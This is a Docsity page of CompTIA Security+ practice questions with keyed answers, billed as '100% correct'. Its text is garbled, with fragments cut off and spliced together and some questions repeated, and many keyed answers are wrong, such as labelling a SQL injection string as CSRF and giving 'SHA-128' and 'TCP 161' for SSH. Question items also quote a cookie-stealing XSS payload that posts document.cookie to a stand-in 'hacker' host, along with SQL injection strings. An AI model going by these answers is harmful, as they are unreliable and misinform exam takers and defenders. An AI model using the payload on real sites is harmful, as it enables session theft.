Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

CompTIA Security+ Practice Test with 100% Correct Answers, Exams of Biology

A series of multiple-choice questions and answers related to comptia security+ certification. It covers various cybersecurity concepts, including network security, cryptography, incident response, and access control. Designed to help individuals prepare for the comptia security+ exam by providing practice questions and explanations for the correct answers.

Typology: Exams

2024/2025

Available from 11/02/2024

tutor-lee-1
tutor-lee-1 🇺🇸

5

(1)

2K documents

1 / 56

Toggle sidebar

Related documents


Partial preview of the text

Download CompTIA Security+ Practice Test with 100% Correct Answers and more Exams Biology in PDF only on Docsity! CompTIA Security+ Practice Test with 100% correct answers During an assessment of a manufacturing plant, a security analyst finds several end-of-life programmable logic controllers, which have firmware that was last updated three years ago and known vulnerabilities. Which of the following BEST mitigates the risks associated with the PLC's? - answer Implement network segmentation to isolate the devices A user is attempting to view and older sent email, but is unable to open the email. Which of the following is the MOST likely cause? - answer The private certificate used to sign the email has expired An organization's Chief Information Officer recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy? - answer TLS Which of the following is a penetration tester performing when running an SMB NULL session scan of a host to determine valid usernames and share names? - answer Credentialed vulnerability scan A Chief Executive Officer of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has most likely occurred? - answer Pharming A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select THREE) - answer Crypto-malware, Botnet attack, Ransomware authentication from within the United States anytime, Allow authentication if the user is accessing email or a shared file system, Do not allow authentication if the AV program is two days out of date, Do not allow authentication if the location of the device is in two specific countries, Given the requirements, which of the following mobile deployment authentication types is being utilized? - answer Context-aware authentication An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy for service technicians from corporate partners? - answer Privileged user account Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? ( Select TWO) - answer Public key, Private key An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? - answer Test Which of the following occurs when a vulnerability scan fails to identify an existing vulnerability? - answer False negative A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? (select TWO) - answer SNMPv3, Syslog A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? - answer Polymorphic worm Which of the following would be considered multifactor authentication? - answer Strong password and fingerprint Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted? - answer Cross-site request forgery Which of the following controls allows a security guard to perform a post-incident review? - answer Detective An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? - answer Backup and archive the production data to an external source A technician has installed an new AAA server, which will be used by the network team to control access to a company's routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company's routers and switches. NWTWORK_TEAM: Lee, Andrea, Pete ALLOW_ACCESS: DOMAIN_USERS, AUTHENTICATED_USERS, NETWORK_TEAM Members of the network team ability to log on to various network devices configured to use the AAA server. Weeks later, an auditor asks to review the following access log sample: 5/26/17 10:20 PERMIT: LEE Which of the following should needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the LAST steps the security analyst should perform prior to electronically sending the message? (Select TWO) - answer Encrypt the message, Digitally sign the message A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server? - answer Shared secret A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit? - answer Banner grabbing An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact. Which of the following is this table an example of? - answer Qualitative risk assessment A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future? - answer Implement a forwarding proxy and URL filtering for the organization's applications Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment? - answer To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur? - answer Impersonation A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users. Which of the following BEST represents the required cloud deployment model? - answer Private A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take? - answer Disable the network connections on the workstation Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? - answer Full A network technician must update the company's wireless configuration settings to comply with new requirements, which mandate the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? - answer Configure CCMP Which of the following differentiates ARP poisoning from a MAC spoofing attack? - answer ARP poisoning uses unsolicited ARP replies A network administrator is downloading the latest software for the organization's core switch. The download page allows users to view the checksum values for the available files. The network administrator is shown the following when viewing the checksum values for the YB_16.swi file: After downloading the file, the network administrator runs a command to show the following output: Which of the following can be determined from the above output? - answer The downloaded file has been corrupted or tampered with A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? - answer Polymorphic worm Which of the following is a compensating control that will BEST reduce the risk of weak passwords? - answer Requiring the user of one-time tokens An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? - answer Crypt-malware A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support contains the following information: Source: 192.168.1.137, Destination: 10.113.10.8, Protocol: TCP, Ports: 636, Time-of-day restriction: None, Proxy bypass required: Yes, Which of the following is being requested to be implemented? - answer LDAPS A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? - answer ARO A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? - answer The certificate has expired An organization wants to move its operations to the cloud. The organization's systems administrators will still maintain control of the servers, firewalls, and load balancers in the cloud environment. Which of the following models is the organization considering? - answer PaaS Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? - answer Token fob A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies this type of penetration testing? - answer Black box A CSIRT has completed restoration procedures related to a breach of sensitive data and is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO) - answer Details regarding system restoration activities completed during the response activity, Suggestions for potential areas of focus during quarterly training activites When considering IoT systems, which of the following represents the GREATEST ongoing risk after vulnerability has been discovered? - answer Tight integration to existing systems A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently deployed PKI services to support this strategy. Which of the following protocols supports the strategy and employs certificates generated by the PKI? (select THREE) - answer S/MIME, TLS, IPSec A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employees receive? - answer User account A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: "SELECT*FROM" and '1'='1' Which of the following can the security administrator determine from this? - answer An SQL injection attack is being attempted A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? - answer TLS host certificate A security administrator is investigating many recent incidents of credential theft for users accessing the company's website, despite the hosting web server requiring HTTPS for access. The server's logs show the website leverages the HTTP POST method for carrying user authentication details. Which of the following is the MOST likely reason for compromise? - answer The HTTP POST method is not protected by HTTPS A technician is investigating a potentially compromised device with the following symptoms: Browser slowness , frequent browser crashes, hourglass stuck, new search toolbar and increased memory consumption. Which of the following types of malware has infected the system? - answer Man-in-the-browser A penetration testing deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack? - answer Injection A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? - answer Perform a containment procedure by disconnecting the server "pull the plug" A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of types of scans MOST likely caused the outage? - answer Intrusive credentialed scan An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) - answer TACACS+, RADIUS After a security assessment was performed on the enterprise network, it was discovered that: 1. Configuration changes have been made by users without the consent of IT 2. Network congestion has increased due to the use of social media 3. Users are accessing file folders and network shares that are beyond the scope of their need to know. Which of the following BEST describes the vulnerabilities that exist in this environment? (Select TWO) - answer Poorly trained users, Improperly configured accounts A security analyst is performing a BIA. The analyst notes that in a disaster, failover systems must be up and running within 30 minutes. The failover systems must use backup data that is no older than one hour. Which of the following should the analyst include in the business continuity plan? - answer A maximum RPO of 60 minutes Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet? - answer Zero-day credentials. After investigating, it seems the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select TWO) - answer RAT, Backdoor Which of the following is a major difference between XSS attacks and remote code exploits? - answer XSS attacks use machine language, while remote exploits use interpreted language A highly complex password policy has made it nearly impossible to crack account passwords. Which of the following might a hacker still be able to perform? - answer Pass-the-hash attack A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted? - answer Credentialed Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? - answer Symmetric algorithm A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (select Two) - answer Review the company's current security baseline, Run an expoitation framework to confirm vulnerabilities To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? - answer Separation of duties Which of the following is used to encrypt web application data? - answer AES Which of the following are used to increase the computation time required to crack a password? (Select Two) - answer BCRYPT, PBKDF2 Which of the following is a compensating control that will BEST reduce the risk of weak passwords? - answer Requiring the use of one-time tokens A recent penetration test revealed several issues with a public-facing website used by customers. The testers were able to Enter long lines of code and special characters; crash the system; gain unauthorized access to the internal application server and map the internal network. The development team has stated they will need to rewrite a significant portion of the codeused, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim? - answer UTM An employee in the finance department receives an email which appears to come from the CFO, instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (select TWO) - answer Urgency, Authority Students at a residence hall are reporting internet connectivity issues. The university's network administrator configured the residence hall's network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall's network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation? - answer Router ACLs A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office TO:ANY PORT:80, 20 PERMIT FROM:ANY TO:ANY PORT:443, 30 DENY FROM: ANY TO:ANY PORT:ANY. Which of the following is the MOST secure solution the security administrator can implement to fix this issue? - answer Replace rule number 10 with the following rule 10 PERMIT FROM:ANY TO:ANY PORT:22 An organization electronically processes sensitive data within a controlled facility. The CISO wants to limit signal from leave the facility. Which of the following mitigates this risk? - answer Hardening the facility with a Faraday cage to contain emissions produced from data processing An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The CISO suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? - answer It provides a consistent baseline A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns the following information: Database: CustomerAccess1 Columns: Password Data type: MD5 Hash Salted?: No.. There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select TWO) - answer Generate password hashes using SHA-256, Require the web server to only use TLS 1.2 encryption While investigating a virus infection, a security analyst discovered the following on an employee laptop; Multiple folders containing a large number of newly released movies and music files, proprietary company data, a large amount of PHI data, unapproved FTP software and Documents that appear to belong to a competitor. Which of the following should the analyst do FIRST? - answer Contact the legal and compliance department for guidance An attacker exploited a vulnerability on a mail server using the code: <HTML><body onload=document.location.replace (*http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ;/> </body> <HTML>. Which of the following BEST explains what the attacker is doing? - answer The attacker is replacing a document A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? - answer Perform a containment procedure by disconnecting the server A CISO asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO? - answer VDI When attackers use a compromised host as a platform for launching attacks deeper into a company's network it is said that they are: - answer Pivoting A security analyst is implementing PKI-based functionality to a web application that has the following requirements: File contains certificate information, Certificate chains, Root authority certificates and Private key. All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these requirements? - answer .pfx certificate Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the windows/CurrentVersion/Run registry key? - answer Active reconnaissance An incident response analyst in a corporate security operations center receives a phone call from an SOC analyst. The SOC analyst explains the help desk recently reimaged a workstation that was suspected of being infected with an unknown type of malware, however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts? - answer Rootkit Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks? - answer Apply firmware and software updates upon availability During a lessons learned meeting regarding a previous incident , the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime, Allow authentication if the user is accessing email or a shared file system, Do not allow authentication if the AV program is two days out of date, Do not allow authentication if the location of the device is in two specific countries, Given the requirements, which of the following mobile deployment authentication types is being utilized? - answer Context-aware authentication A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over un-trusted media. Which of the following BEST describes the action performed by this type of application? - answer Obfuscation A company wants to ensure confidential data storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? - answer Shredding A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? - answer Banner grabbing Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? - answer Privilege escalation When developing an application, executing a preconfigured set of instructions is known as: - answer A stored procedure A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the internet, regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? - answer Configure the OS default TTL to 1 An application was recently compromised after some malformed data came in via a web form. Which of the following would MOST likely have prevented this? - answer Input validation When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: - answer Pivoting A new Chief Information Officer has been reviewing the badging procedures and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? - answer Administrative Which of the following refers to the term used to restore a system to its operational state? - answer MTTR A security administrator must implement a network that is immune to ARP spoofing attacks. Which of the following should be implemented to ensure that a malicious insider will not be able to successfully use ARP spoofing techniques? - answer IPv6 Which system should you implement if you want to create a file system access control model where you can label files as "Secret", Confidential", "Restricted", or "Unclassified"? - answer Trusted OS Bob, an employee, was escorted from the company premises due to suspicion of revealing trade secrets to a competitor. Bob had already been working for two hours before leaving the premises. A security technician was asked to prepare a report of files that had changed since last night's integrity scan. Which of the following could the technician use to prepare the report? (Select TWO). - answer MD5, HMAC Which is the hardest to crack and requires both parties to exchange the encryption key before communicating? - answer One-time pads Bob needs to send Sally a digitally signed and encrypted email. Which algorithms and keys is used to complete these actions? - answer Sally's public key to encrypt using 3DES, Bob's private key to sign using SHA In order to digitally sign your emails with PGP, what needs to be created first? - answer A public and private key A company wants to improve its overall security posture by deploying environmental controls in its datacenter. Which of the following is considered an environmental control that can be deployed to meet this goal? - answer Proximity readers Ann, a security administrator, is strengthening the security controls of the company's campus. Her goal is to prevent people from accessing open locations that are not supervised, such as around the receiving dock. She is also concerned that employees are using these entry points as a way of bypassing the security guard at the main entrance. Which of the following should Ann recommend that would BEST address her concerns? - answer Build fences around campus with gate entrances A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack? - answer Configure flood guards on the switch A software security concern when dealing with hardware and devices that have embedded software or operating systems is: - answer The vendor may not have a method for installation of patches Ann a technician received a spear-phishing email asking her to update her personal information by clicking the link within the body of the email. Which of the following type of training would prevent Ann and other employees from becoming victims to such attacks? - answer Personal identifiable information Which of the following is a step in deploying a WPA2- Enterprise wireless network? - answer Install a digital certificate on the authentication server Which of the following can be provided to an AAA system for the identification phase? - answer Username A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack? - answer Configure flood guards on the switch The Chief Information Security Officer is concerned that users could bring their personal laptops to work and plug them directly into the network ports under their desks. Which of the following should be configured on the network switch to prevent this from happening? - answer Port security A small company has recently purchased cell phones for managers to use while working outside of the office. The company does not currently have a budget for mobile device management and is primarily concerned with deterring leaks of sensitive information obtained by unauthorized access to unattended phones. Which of the following would provide the solution that BEST meets the company's requirements? - answer Screen lock Which of the following technologies would be MOST appropriate to utilize when testing a new software patch before a company-wide deployment? - answer Virtualization Which of the following would an attacker use to generate and capture additional traffic prior to performing an IV attack? - answer Dictionary attack An administrator wants to establish a WiFi network using a high gain directional antenna with a narrow radiation pattern to connect two buildings separated by a very long distance. Which of the following antennas would be BEST for this situation? - answer Yagi Joe, the system administrator, has been asked to calculate the Annual Loss Expectancy (ALE) for a $5,000 server, which often crashes. In the past year, the server has crashed 10 times, requiring a system reboot to recover with only 10% loss of data or function. Which of the following is the ALE of this server? - answer $500 Which of the following can be used to ensure that sensitive records stored on a backend server can only be accessed by a front end server with the appropriate record key? - answer File encryption A system administrator is configuring UNIX accounts to authenticate against an external server. The configuration file asks for the following information DC=ServerName and DC=COM. Which of the following authentication services is being used? - answer LDAP Which of the following is an XML based open standard used in the exchange of authentication and authorization information between different parties? - answer SAML Which of the following is an authentication method that can be secured by using SSL? - answer LDAP Ann a member of the Sales Department has been issued a company-owned laptop for use when traveling to remote sites. Which of the following would be MOST appropriate when configuring security on her laptop? - answer Configure the laptop with a BIOS password An overseas branch office within a company has many more technical and non-technical security incidents than other parts of the company. Which of the following management controls should be introduced to the branch office to improve their state of security? - answer Continuous security monitoring process Which of the following can be used to maintain a higher level of security in a SAN by allowing isolation of mis- configurations or faults? - answer VSAN A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access? - answer 802.1x Virutalization would provide an ROI when implemented under which of the following situations? - answer Multiple existing but underutilized physical servers An administrator wants to restrict traffic between two VLANs. The network devices connecting the two VLANs are layer 3 switches. Which of the following should the admin configure? - answer ACL Which of the following is susceptible to an attack that can obtain the wireless password by brute-forcing a 4-digit PIN followed by a 3-digit PIN? - answer WPS A server administrator is investigating a breach and determines an attacker modified the application log to obscure the attack vector. During the lessons learned activity, the facilitator asks for a mitigation response to protect the integrity of the logs should a similar attack occur. Which of the following mitigations would be MOST appropriate to fulfill the requirement? - answer Enterprise SIEM In order to comply with new auditing standards, a security administrator must be able to complete system security alert logs directly with the employee who triggers the alert. Which of the following should the security administrator implement in order to meet this requirement? - answer Elimination of shared accounts An employee is using company time and assets to use a third party tool to share downloadable media with other users around the world. Sharing downloadable media is not expressly forbidden in the company security policy or acceptable use policy. Which of the following BEST describes what the security staff should consider adding to these policies? - answer P2P The network administrator wants to assign VLANs based on which user is logging into the network. Which of the following should the administrator use to accomplish this? (select Two) - answer MAC filtering, 802.1x A company implemented a public-facing authentication system that uses PKI and extended attributes to allow third-party, web-based application integration. This is an example of which of the following? (select three) - answer Federation, Two-factor authentication, Single sign-on An employee connects to a public wireless hotspot during a business trip. The employee attempts to go to a secure website but instead connects to an attacker who is performing a MITM attack. Which of the following should the employee do to mitigate the vulnerability described In the scenario? - answer Connect to a VPN when using public wireless networks Joe, a security administrator, recently configured a method of secure access for remote administration of network devices. When he attempts to connect to an access layer switch in the organization from outside the network he is unable to successfully connect. Which of the following ports should be open on the firewall for Joe to successfully connect to the switch? - answer TCP 161 During an audit of a software development organization, an auditor finds the organization did not properly follow industry best practices, including peer review and board approval, prior to moving applications into the production environment. The auditor recommends adopting a formal process incorporating these steps. To remediate the finding, the organization implements: - answer Change management Two companies are partnering to bid on a contract. Normally these companies are fierce competitors, but for this procurement they have determined that a partnership is the only way they can win the job. Both companies are concerned about unauthorized data sharing and want to ensure other divisions within each company will not have access to proprietary data. To best protect against unauthorized data sharing they should each sign a: - answer BPA A recent network audit revealed several devices on the internal network were not running antivirus or HIPS. Upon further investigation, it was discovered that these devices were new laptops that were deployed without installing the end-point protection suite used by the company. Which of the following could be used to mitigate the risk of authorized devices that are unprotected residing on the network? - answer MAC filtering Ann is attempting to send a digitally signed message to Joe. Which of the following should Ann do? - answer Encrypt a certificate signing request with her private key compared, the analyst must use an algorithm that is known to have the lowest collision rate. Which of the following should be selected? - answer SHA-128 John wants to secure an 802.11n network. Which of the following encryption methods would provide the highest level of protection? - answer WPA2 with AES Which of the following is the MOST influential concern that contributes to an organization's ability to extend enterprise policies to mobile devices? - answer Support of mobile OS Which of the following MUST be implemented to ensure accountability? - answer shared accounts Which of the following attack types is MOST likely to cause damage or data loss for an organization and be difficult to investigate? - answer DDoS The remote branch of an organization has been assigned two public IP addresses by an ISP. The organization has ten workstations and a wireless router. Which of the following should be deployed to ensure that all devices have internet access? - answer Port Address Trsanslation (PAT) A security administrator wishes to perform authentication, authorization, and accounting, but does not wish to use a proprietary protocol. Which of the following services would fulfill these requirements? - answer TACACS+ Which of the following is the FASTEST method to disclose one way hashed passwords? - answer Rainbow tables